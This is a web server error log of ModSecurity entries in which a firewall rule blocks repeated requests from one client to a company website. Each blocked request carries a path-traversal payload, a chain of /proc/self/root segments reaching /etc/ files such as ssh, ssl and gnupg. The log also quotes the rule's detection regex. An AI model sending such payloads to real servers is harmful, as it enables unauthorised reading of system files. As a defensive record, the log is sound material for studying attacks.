[Fri Mar 20 07:00:23.520317 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:59054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0at_XLqtnMIWvjpaKNhAAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:24.811000 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.243.128:33178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0auPHIg5MgXLBnicPr0QAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:29.384971 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:33192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0avfHIg5MgXLBnicPr2AAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:30.746421 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:57824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0avhCii7xarUs8iHZa5QAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:32.167159 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.243.128:57830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0awF1pVZ5mVmJwsFMikgAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:34.663098 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:57834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0awgF0L0L-SsrnPo5bjAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:35.940591 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:57844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0aw9a6ubjKNq_cu4bGmAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:37.275486 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:57858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0axV1pVZ5mVmJwsFMilQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:38.601534 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.243.128:57868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0axl1pVZ5mVmJwsFMilwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:39.925052 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:54638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ax9a6ubjKNq_cu4bGmQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:44.387904 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:54648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ayxCii7xarUs8iHZa6gAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:45.811100 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:54650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0azV1pVZ5mVmJwsFMimQAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:47.171260 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.243.128:54660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0az_XLqtnMIWvjpaKNkQAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:47.389167 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:54660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0az_XLqtnMIWvjpaKNkgAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:48.765027 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:54674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a0OoXxyEfFpUF8f91EwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:50.075752 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.243.128:36560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a0vqxLDW4GITHUkTY-wAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:51.411428 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:36562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a0wF0L0L-SsrnPo5bjwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:52.725558 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:36578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a1OoXxyEfFpUF8f91FwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:54.192521 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:36582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a1vXLqtnMIWvjpaKNlgAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:55.518924 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:36588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a1-oXxyEfFpUF8f91GQAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:00:56.907025 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:36596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0a2PXLqtnMIWvjpaKNmQAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
